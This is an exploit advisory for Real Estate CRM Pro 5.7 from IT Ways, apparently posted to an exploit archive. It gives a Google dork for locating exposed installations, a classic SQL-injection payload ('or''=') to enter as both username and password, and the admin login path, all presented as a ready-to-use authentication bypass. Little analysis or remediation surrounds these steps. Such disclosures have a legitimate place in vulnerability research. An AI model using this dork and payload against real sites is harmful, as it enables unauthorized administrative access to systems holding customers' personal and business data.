Headline
Real Estate CRM Pro 5.7 SQL Injection
Real Estate CRM Pro from IT Ways version 5.7 appears to suffer from a remote SQL injection vulnerability that can allow for authentication bypass.
====================================================================================================================================| # Title : Real Estate CRM Pro v 5.7 Auth By Pass Vulnerability || # Author : indoushka || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.itways.in/product/real-estate-crm-pro/ | | # Dork : "Developed by IT Ways" |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : 'or''=' & Pass : 'or''='[+] https://127.0.0.1/saathirealtycom/crm/admin/Greetings to :========================================================================================================================= |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | |=======================================================================================================================================